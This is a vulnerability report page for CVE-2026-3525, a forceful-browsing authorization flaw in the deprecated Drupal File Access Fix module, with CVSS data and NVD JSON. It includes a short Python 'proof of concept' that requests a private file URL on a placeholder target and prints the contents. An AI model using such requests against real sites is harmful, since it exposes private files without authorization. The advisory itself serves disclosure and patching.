Security Vulnerability Report
中文
CVE-2026-3525 CVSS 5.3 MEDIUM

CVE-2026-3525

Published: 2026-03-26 21:17:08
Last Modified: 2026-03-31 20:24:46

Description

Incorrect Authorization vulnerability in Drupal File Access Fix (deprecated) allows Forceful Browsing.This issue affects File Access Fix (deprecated): from 0.0.0 before 1.2.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:geeks4change:file_access_fix:*:*:*:*:*:drupal:*:* - VULNERABLE
Drupal File Access Fix < 1.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-3525 Proof of Concept # Target: Drupal File Access Fix (deprecated) < 1.2.0 # Vulnerability Type: Incorrect Authorization / Forceful Browsing target_url = "http://target-site.com/sites/default/files/private/sensitive_file.txt" # The vulnerability allows bypassing access controls on restricted files. try: response = requests.get(target_url) if response.status_code == 200: print(f"[+] Success! File content retrieved:\n{response.text}") else: print(f"[-] Failed. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3525", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:08.437", "lastModified": "2026-03-31T20:24:46.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Authorization vulnerability in Drupal File Access Fix (deprecated) allows Forceful Browsing.This issue affects File Access Fix (deprecated): from 0.0.0 before 1.2.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización incorrecta en Drupal File Access Fix (obsoleto) permite la navegación forzada. Este problema afecta a File Access Fix (obsoleto): desde 0.0.0 antes de 1.2.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:geeks4change:file_access_fix:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "8.x-1.2", "matchCriteriaId": "FE4D1759-491C-4313-9B83-1900F72F5730"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2026-020", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}